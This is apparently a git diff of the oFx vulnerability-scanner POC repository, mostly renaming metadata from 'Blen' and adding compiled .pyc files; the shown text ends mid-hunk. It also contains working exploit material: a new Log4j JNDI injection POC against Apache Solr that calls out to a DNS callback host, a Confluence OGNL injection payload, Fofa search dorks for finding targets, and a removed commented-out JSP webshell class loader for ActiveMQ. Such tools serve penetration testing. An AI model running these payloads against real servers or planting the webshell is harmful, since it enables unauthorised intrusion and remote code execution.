diff --git a/poc/360/TianQing_Unauth_Acceess/__pycache__/poc.cpython-38.pyc b/poc/360/TianQing_Unauth_Acceess/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..9aba519 Binary files /dev/null and b/poc/360/TianQing_Unauth_Acceess/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/360/TianQing_Unauth_Acceess/poc.py b/poc/360/TianQing_Unauth_Acceess/poc.py index c237c20..61ddb68 100644 --- a/poc/360/TianQing_Unauth_Acceess/poc.py +++ b/poc/360/TianQing_Unauth_Acceess/poc.py @@ -9,7 +9,7 @@ urllib3.disable_warnings() class POC(POCBase): - + _info = { "author" : "jijue", # POC作者 diff --git a/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/__pycache__/poc.cpython-38.pyc b/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c73dba0 Binary files /dev/null and b/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/poc.py b/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/poc.py index 6d005fd..8e01efd 100644 --- a/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/poc.py +++ b/poc/ACME/File_Read_mini_httpd_CVE_2018_18778/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "mini_httpd任意文件读取漏洞(CVE-2018-18778)", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : "ACME mini_httpd before 1.30", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Alibaba_Druid/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Alibaba_Druid/Unauth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b33cf05 Binary files /dev/null and b/poc/Alibaba_Druid/Unauth_Access/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Alibaba_Druid/Unauth_Access/poc.pyc b/poc/Alibaba_Druid/Unauth_Access/poc.pyc index e220e4e..40f4172 100644 Binary files a/poc/Alibaba_Druid/Unauth_Access/poc.pyc and b/poc/Alibaba_Druid/Unauth_Access/poc.pyc differ diff --git a/poc/Alibaba_FastJson/RCE_CVE_2017_18349/__pycache__/poc.cpython-38.pyc b/poc/Alibaba_FastJson/RCE_CVE_2017_18349/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..ea21624 Binary files /dev/null and b/poc/Alibaba_FastJson/RCE_CVE_2017_18349/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py b/poc/Alibaba_FastJson/RCE_CVE_2017_18349/poc.py similarity index 93% rename from poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py rename to poc/Alibaba_FastJson/RCE_CVE_2017_18349/poc.py index a608be5..844adb9 100644 --- a/poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py +++ b/poc/Alibaba_FastJson/RCE_CVE_2017_18349/poc.py @@ -9,12 +9,12 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "hansi", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2021-06-09", # POC创建时间 "UpdateDate" : "2021-06-09", # POC创建时间 "PocDesc" : """ - 组件类的漏洞并不适合直接拿到BLEN里批量扫,失败是可以预见的事情,笔者建议的是在渗透过程中将可疑的url拿来测试 + 组件类的漏洞并不适合直接拿到oFx里批量扫,失败是可以预见的事情,笔者建议的是在渗透过程中将可疑的url拿来测试 """, # POC描述,写更新描述,没有就不写 "name" : "Fastjson 反序列化远程代码执行漏洞(CVE-2017-18349)", # 漏洞名称 @@ -36,7 +36,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Alibaba_Nacos/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Alibaba_Nacos/Unauth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a34f0fa Binary files /dev/null and b/poc/Alibaba_Nacos/Unauth_Access/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Alibaba_Nacos/Unauth_Access/poc.pyc b/poc/Alibaba_Nacos/Unauth_Access/poc.pyc index 241e773..4e85445 100644 Binary files a/poc/Alibaba_Nacos/Unauth_Access/poc.pyc and b/poc/Alibaba_Nacos/Unauth_Access/poc.pyc differ diff --git a/poc/Apache_ActiveMQ/Physical_Path_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Apache_ActiveMQ/Physical_Path_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c4cbfb7 Binary files /dev/null and b/poc/Apache_ActiveMQ/Physical_Path_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py b/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py index 1ed5bc9..62e5041 100644 --- a/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py +++ b/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py @@ -9,7 +9,7 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "jijue&&hansi", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2022-01-01", # POC创建时间 "UpdateDate" : "2022-01-01", # POC创建时间 @@ -36,7 +36,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/__pycache__/poc.cpython-38.pyc b/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d183570 Binary files /dev/null and b/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/poc.py b/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/poc.py index db554d1..18a2f0b 100644 --- a/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/poc.py +++ b/poc/Apache_ActiveMQ/RCE_FileServer_CVE_2016_3088/poc.py @@ -14,7 +14,7 @@ class POC(POCBase): "CreateDate" : "2021-06-09", # POC创建时间 "UpdateDate" : "2021-06-09", # POC创建时间 "PocDesc" : """ - 略 + 略 """, # POC描述,写更新描述,没有就不写 "name" : "Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)", # 漏洞名称 @@ -27,7 +27,7 @@ class POC(POCBase): """, # 漏洞简要描述 "fofa-dork":""" - + app="APACHE-ActiveMQ" """, # fofa搜索语句 "example" : "", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 @@ -52,38 +52,7 @@ class POC(POCBase): } filename = random_str() filecontent = random_str() -# filecontent = """ -# <%! -# class ON extends ClassLoader{ -# ON(ClassLoader c){super(c);} -# public Class qualified(byte[] b){ -# return super.defineClass(b, 0, b.length); -# } -# } -# public byte[] interacts(String str) throws Exception { -# Class base64; -# byte[] value = null; -# try { -# base64=Class.forName("sun.misc.BASE64Decoder"); -# Object decoder = base64.newInstance(); -# value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str }); -# } catch (Exception e) { -# try { -# base64=Class.forName("java.util.Base64"); -# Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); -# value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str }); -# } catch (Exception ee) {} -# } -# return value; -# } -# %> -# <% -# String cls = request.getParameter("123"); -# if (cls != null) { -# new ON(this.getClass().getClassLoader()).qualified(interacts(cls)).newInstance().equals(new Object[]{request,response}); -# } -# %> -# """ + try: """ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 diff --git a/poc/Apache_ActiveMQ/WeakPass/__pycache__/poc.cpython-38.pyc b/poc/Apache_ActiveMQ/WeakPass/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c689c98 Binary files /dev/null and b/poc/Apache_ActiveMQ/WeakPass/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_ActiveUC/Active_UC_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Apache_ActiveUC/Active_UC_Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..cf2d480 Binary files /dev/null and b/poc/Apache_ActiveUC/Active_UC_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/__pycache__/poc.cpython-38.pyc b/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4b1fc10 Binary files /dev/null and b/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/poc.py b/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/poc.py index bc804bc..6ca3d93 100644 --- a/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/poc.py +++ b/poc/Apache_ApiSix/DashBoard_Auth_Bypass_CVE_2021_45232/poc.py @@ -38,7 +38,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/__pycache__/poc.cpython-38.pyc b/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e11b92a Binary files /dev/null and b/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/poc.py b/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/poc.py index 9b996f6..2ab92eb 100644 --- a/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/poc.py +++ b/poc/Apache_ApiSix/Default_Key_CVE_2020_13945/poc.py @@ -39,7 +39,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Apache_CouchDB/Priv_Escalation_CVE_2017_12635/__pycache__/poc.cpython-38.pyc b/poc/Apache_CouchDB/Priv_Escalation_CVE_2017_12635/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..86fba97 Binary files /dev/null and b/poc/Apache_CouchDB/Priv_Escalation_CVE_2017_12635/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Druid/File_Read_CVE_2021_36749/__pycache__/poc.cpython-38.pyc b/poc/Apache_Druid/File_Read_CVE_2021_36749/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7ace203 Binary files /dev/null and b/poc/Apache_Druid/File_Read_CVE_2021_36749/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Flink/Dir_Traversal_CVE-2020-17519/__pycache__/poc.cpython-38.pyc b/poc/Apache_Flink/Dir_Traversal_CVE-2020-17519/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8f26e92 Binary files /dev/null and b/poc/Apache_Flink/Dir_Traversal_CVE-2020-17519/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Flink/RCE_CVE_2020_17518/__pycache__/poc.cpython-38.pyc b/poc/Apache_Flink/RCE_CVE_2020_17518/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..fc690d4 Binary files /dev/null and b/poc/Apache_Flink/RCE_CVE_2020_17518/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Kudu/Apache_Kudu_UnAuth_Access/poc.py b/poc/Apache_Kudu/Apache_Kudu_UnAuth_Access/poc.py deleted file mode 100644 index f70674d..0000000 --- a/poc/Apache_Kudu/Apache_Kudu_UnAuth_Access/poc.py +++ /dev/null @@ -1,72 +0,0 @@ -# coding:utf-8 -import requests -from lib.core.common import url_handle,get_random_ua -from lib.core.poc import POCBase -# ... -import urllib3 -urllib3.disable_warnings() - -class POC(POCBase): - - _info = { - "author" : "hansi", # POC作者 - "version" : "1", # POC版本,默认是1 - "CreateDate" : "2022-01-10", # POC创建时间 - "UpdateDate" : "2022-01-10", # POC创建时间 - "PocDesc" : """ - 略 - """, # POC描述,写更新描述,没有就不写 - - "name" : "Apache Kudu存在未授权访问漏洞", # 漏洞名称 - "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 - "AppName" : "Apache Kudu未授权访问漏洞", # 漏洞应用名称 - "AppVersion" : "", # 漏洞应用版本 - "VulnDate" : "2022-01-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx - "VulnDesc" : """ - - """, # 漏洞简要描述 - - "fofa-dork":""" - ”Kudu” - """, # fofa搜索语句 - "example" : "http://111.1.10.15:8060/", # 存在漏洞的演示url,写一个就可以了 - "exp_img" : "", # 先不管 - } - - def _verify(self): - """ - 返回vuln - - 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 - - 不存在漏洞:vuln = [False,""] - """ - vuln = [False,""] - url = self.target + "" # url自己按需调整 - - headers = {"User-Agent":get_random_ua(), - "Connection":"close", - "Content-Type": "application/x-www-form-urlencoded", - } - - try: - """ - 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 - """ - req = requests.get(url,headers = headers ,proxies = self.proxy ,timeout = self.timeout,verify = False) - if req.status_code ==200 and "RPCs" in req.text: - vuln = [True,req.text] - else: - vuln = [False,req.text] - except Exception as e: - raise e - - # 以下逻辑酌情使用 - if self._honeypot_check(vuln[1]) == True: - vuln[0] = False - - return vuln - - def _attack(self): - return self._verify() - diff --git a/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/__pycache__/poc.cpython-38.pyc b/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..ac686cb Binary files /dev/null and b/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/poc.py b/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/poc.py index e89e4b5..0fea246 100644 --- a/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/poc.py +++ b/poc/Apache_Kylin/Conf_Info_Disclosure_CVE_2020_13937/poc.py @@ -17,7 +17,7 @@ class POC(POCBase): 略 """, # POC描述,写更新描述,没有就不写 - "name" : "Apache Kylin 未授权配置泄露 CVE-2020-13937", # 漏洞名称 + "name" : "Apache Kylin 未授权配置泄露(CVE-2020-13937)", # 漏洞名称 "VulnID" : "CVE-2020-13937", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Apache Kylin", # 漏洞应用名称 "AppVersion" : """ @@ -59,7 +59,7 @@ class POC(POCBase): 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) - if "config" in req.text:#req.status_code == 200 and : + if '{"config":"' in req.text:#req.status_code == 200 and : vuln = [True,req.text] else: vuln = [False,req.text] diff --git a/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/__pycache__/poc.cpython-38.pyc b/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..2ea091c Binary files /dev/null and b/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/poc.py b/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/poc.py index cc8b8b8..6af5175 100644 --- a/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/poc.py +++ b/poc/Apache_Mod_jk/ACbypass_CVE_2018_11759/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Apache Mod_jk 访问控制权限绕过(CVE-2018-11759)", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Apache Mod_jk", # 漏洞应用名称 "AppVersion" : "Apache Mod_jk Connector 1.2.0 ~ 1.2.44", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Apache_Solr/CVE_2019_17558/__pycache__/poc.cpython-38.pyc b/poc/Apache_Solr/CVE_2019_17558/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5c6a954 Binary files /dev/null and b/poc/Apache_Solr/CVE_2019_17558/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Solr/File_Read/__pycache__/poc.cpython-38.pyc b/poc/Apache_Solr/File_Read/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4f5226e Binary files /dev/null and b/poc/Apache_Solr/File_Read/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Solr/File_Read/poc.py b/poc/Apache_Solr/File_Read/poc.py index d35d09a..44ac91f 100644 --- a/poc/Apache_Solr/File_Read/poc.py +++ b/poc/Apache_Solr/File_Read/poc.py @@ -21,7 +21,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Apache Solr 任意文件读取漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Apache Solr", # 漏洞应用名称 "AppVersion" : "Apache Solr <= 8.8.1", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/__pycache__/poc.cpython-38.pyc b/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..df20738 Binary files /dev/null and b/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py b/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py new file mode 100644 index 0000000..6435d44 --- /dev/null +++ b/poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py @@ -0,0 +1,85 @@ +# coding:utf-8 +import requests +import time +from lib.core.common import get_ceye_dns, url_handle,get_random_ua,random_str,verify_ceye_dns +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 该漏洞没有回显,因此POC需要接通dns平台,现已支持知道创宇的ceye,配置位置为项目根目录下的info.ini + 这是笔者针对没有回显的漏洞写的第一个oFx POC,以后不会解释这么多 + """, # POC描述,写更新描述,没有就不写 + + "name" : "Apache Solr 远程命令执行 Log4j", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "Apache Solr", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + Apache Solr引用了Log4j,因为CVE-2021-44228 balabalaba。。我编不出来了,大概的意思懂得都懂 + 笔者最早是在PeiQi看到的,就写了这么个东西 + """, # 漏洞简要描述 + + "fofa-dork":""" + + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + + success,dns_flag = get_ceye_dns() + if success == False: + return [False,dns_flag] + + url = self.target + "/solr/admin/collections?action=$%7bjndi:ldap://"+dns_flag+"%7d&wt=jso" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + + flager = verify_ceye_dns(dns_flag) + + if flager == True: + vuln = [True,dns_flag] + elif flager == False: + vuln = [False,dns_flag] + else: + vuln = [False,flager] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/BSPHP/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/BSPHP/Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a8507fd Binary files /dev/null and b/poc/BSPHP/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/BSPHP/Info_Disclosure/poc.py b/poc/BSPHP/Info_Disclosure/poc.py index 20c434a..a0f8b9b 100644 --- a/poc/BSPHP/Info_Disclosure/poc.py +++ b/poc/BSPHP/Info_Disclosure/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "BSPHP 未授权访问 信息泄露漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "BSPHP", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Bithighway_碧海威/Weak_Pass_L7/__pycache__/poc.cpython-38.pyc b/poc/Bithighway_碧海威/Weak_Pass_L7/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..477d82b Binary files /dev/null and b/poc/Bithighway_碧海威/Weak_Pass_L7/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Bithighway_碧海威/Weak_Pass_L7/poc.py b/poc/Bithighway_碧海威/Weak_Pass_L7/poc.py index 47b317a..fda7ba5 100644 --- a/poc/Bithighway_碧海威/Weak_Pass_L7/poc.py +++ b/poc/Bithighway_碧海威/Weak_Pass_L7/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "碧海威 L7 弱口令漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "碧海威 L7", # 漏洞应用名称 "AppVersion" : "None", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/C_Lodop/File_Read/__pycache__/poc.cpython-38.pyc b/poc/C_Lodop/File_Read/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..04fb58e Binary files /dev/null and b/poc/C_Lodop/File_Read/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/__pycache__/poc.cpython-38.pyc b/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4944fad Binary files /dev/null and b/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py b/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py index 899d06b..9e62291 100644 --- a/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py +++ b/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "中国移动 禹路由", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/__pycache__/poc.cpython-38.pyc b/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d4eef4d Binary files /dev/null and b/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py b/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py index 45dd5f1..28362b5 100644 --- a/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py +++ b/poc/China_TeleCOM_中国电信/RCE_F460_GateWay/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "电信天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "电信天翼网关F460", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2014-03-03", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/__pycache__/poc.cpython-38.pyc b/poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..e3d830d Binary files /dev/null and b/poc/China_TeleCOM_中国电信/Weak_Pass_DaTang_AC_Manager/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Confluence/OGNL_Injection_CVE_2021_26084/__pycache__/poc.cpython-38.pyc b/poc/Confluence/OGNL_Injection_CVE_2021_26084/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c7b08b4 Binary files /dev/null and b/poc/Confluence/OGNL_Injection_CVE_2021_26084/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Confluence/OGNL_Injection_CVE_2021_26084/poc.py b/poc/Confluence/OGNL_Injection_CVE_2021_26084/poc.py index f005b6b..4605c61 100644 --- a/poc/Confluence/OGNL_Injection_CVE_2021_26084/poc.py +++ b/poc/Confluence/OGNL_Injection_CVE_2021_26084/poc.py @@ -53,7 +53,7 @@ class POC(POCBase): """ vuln = [False,""] url = self.target + "/pages/createpage-entervariables.action?SpaceKey=x" # url自己按需调整 - data = "queryString=Blen\\u0027%2b#{6*666}%2b\\u0027" + data = "queryString=ofx\\u0027%2b#{6*666}%2b\\u0027" headers = {"User-Agent":get_random_ua(), "Connection":"close", @@ -65,7 +65,7 @@ class POC(POCBase): 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) - if "Blen{3996=null}" in req.text: + if "ofx{3996=null}" in req.text: vuln = [True,req.text] else: vuln = [False,req.text] diff --git a/poc/Coremail/Conf_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Coremail/Conf_Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8d87cbd Binary files /dev/null and b/poc/Coremail/Conf_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Coremail/Conf_Info_Disclosure/poc.py b/poc/Coremail/Conf_Info_Disclosure/poc.py index fb7ea6b..0663f4b 100644 --- a/poc/Coremail/Conf_Info_Disclosure/poc.py +++ b/poc/Coremail/Conf_Info_Disclosure/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # 